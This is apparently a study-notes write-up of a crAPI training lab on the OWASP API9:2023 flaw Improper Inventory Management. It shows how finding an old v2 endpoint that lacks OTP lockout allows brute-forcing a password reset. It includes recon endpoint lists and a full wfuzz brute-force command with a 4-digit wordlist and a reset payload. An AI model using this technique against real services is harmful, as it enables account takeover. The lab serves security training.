😚API9:2023 Improper Inventory Management

today i will talk about this API vulnerability and the steps to find it by Solving lab from CRAPI (vulnerable API application )

It's nothing new, but I liked the idea of ​​this lab during study Api Penetration Testing Cource from Api University Platform, , so I will try to explain it step by step in a simple way and i will

API9:2023 Improper Inventory Management

  • it's a Vulnerability found when application still using API out of date/old versions of APIs. it happen when you upgrade from version 3 to version 4 but leave the old version

  • attacker discover unsupported and non-production versions of an API during Reconnaissance ( all of the APIs that are running, all the endpoints, versions, older versions, who's accessing them )

Common endpoints you can find During Recon :

  • like our API has update to Version 3 and some end points still use Version 2 like :

    • api.target.com/v3

    • /api/v2/accounts

    • /api/v3/accounts

    • /v2/accounts

  • API versioning could also be maintained as a header:

    • Accept: version=2.0

    • Accept API-version=3

  • Non-production versions of an API include any version of the API that wasn’t meant for end-user consumption مش متخصص للاستخدام للمستخدم العادي (نسخه تجريبيه)

    • api.test.target.com

    • api.uat.target.com

    • beta.api.com

    • /api/private

    • /api/partner

    • /api/test

Scenario ( Use Old Version of Api to Brute Force OTP Code )

  1. fuzzing requests in our Postman collection to sort version we have

  2. configure a test using the Collection Editor

    1. select Collection and choose edit

    2. add this script to know which request has been successfully received :

      1. pm.test("Status code is 200", function () { pm.response.to.have.status(200); })

    3. choose run collection option ⇒ remove requests that doesn’t have version number

    4. remove the token to Run an unauthenticated baseline scan of the crAPI collection

  1. when we make a test with non authentication we get failed in all requests

  1. create a new environment

    1. create a variable give it value v1 in initial value and current value

  2. "Find and Replace" all requests with v2 and replace the all to our variable {{ver}} ( v1 )

    1. to turn the collection's current versions into a variable

    2. put variable name between{{ }} like {{ver}} and choose select all to replace it in all requests

  3. after run i found that the v3 get error 404

  1. let’s change the current value to V2 and run again OTP request with replace version to 1 get ⇒ internal server error 500

  1. let’s try 2 times by give the real version with 2 request ⇒ first with v2 and second with v3

first one with v2
second with v3

  1. this is the worst thing because we can use Unsupported Version ⇒ we get success

  2. when we try to many time to enter OTP in v3 account locked then we can’t do brute force

  3. but in V2 Brute force is available and account didn’t lock ⇒ this is the vulnerability

  4. let’s enable the burp proxy from postman by ⇒ by enter setting then ⇒ add custom proxy and put same ip and port for burp

  5. grep “Invalid” word because the correct OTP give same response 500 but different error

  6. let’s check our mail of CRAPI platform

  7. it’s the same and here we success let’s try it with Wfuzz tool to make a brute Force Then send Post request with the new OTP & new Password :

    1. wfuzz -d '{"[k](mailto:email%22:%22hapihacker@email.com)ero@kero.com", "otp":"FUZZ","password":"NewPassword1"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/SecLists-master/Fuzzing/4-digits-0000-9999.txt -u [http://crapi.apisec.ai/identity/api/auth/v2/check-otp](http://crapi.apisec.ai/identity/api/auth/v2/check-otp) --hc 500

  8. here we Success in login

PreviousSSRFNextPrivilege Escalation

Last updated